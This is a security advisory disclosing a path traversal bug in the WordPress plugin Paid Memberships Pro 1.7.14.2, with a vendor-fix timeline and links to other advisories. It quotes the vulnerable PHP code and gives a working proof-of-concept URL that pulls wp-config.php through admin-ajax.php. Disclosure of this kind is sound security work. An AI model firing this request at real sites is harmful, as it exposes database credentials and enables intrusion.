17-11-2014 / Vulnerabilities

Paid Memberships Pro 1.7.14.2 Path Traversal

getfile.php is accessible to everyone.

File: paid-memberships-pro\includes\services.php

add_action('wp_ajax_nopriv_getfile', 'pmpro_wp_ajax_getfile');
function pmpro_wp_ajax_getfile()
{
	require_once(dirname(__FILE__) . "/../services/getfile.php");	
	exit;	
}

_isadmin() function is used to check priveleges but because this code is run in context of wp-admin/admin-ajax.php this function always evalute to true.

So we can download any file.

Proof of Concept

http://wordpress-url/wp-admin/admin-ajax.php?action=getfile&/../../wp-config.php

Timeline

14-10-2014: Discovered
06-11-2014: Vendor notified
14-11-2014: Version 1.7.15 released, issue resolved

Vulnerabilities

Kallithea <= 0.3.4 Incorrect access control and XSS

This vulnerability allows a normal user to modify the permissions of repositories that he normally shouldn’t have access to.

12-12-2018

2 MIN READ

Vulnerabilities

Gitea 1.4.0 Unauthenticated Remote Code Execution

This is part 1 of 3 about bugs inside Gitea

05-07-2018

5 MIN READ

Vulnerabilities

ManageEngine Exchange Reporter Plus Unauthenticated Remote Code Execution

How to create a Metasploit module in example?

28-06-2018

1 MIN READ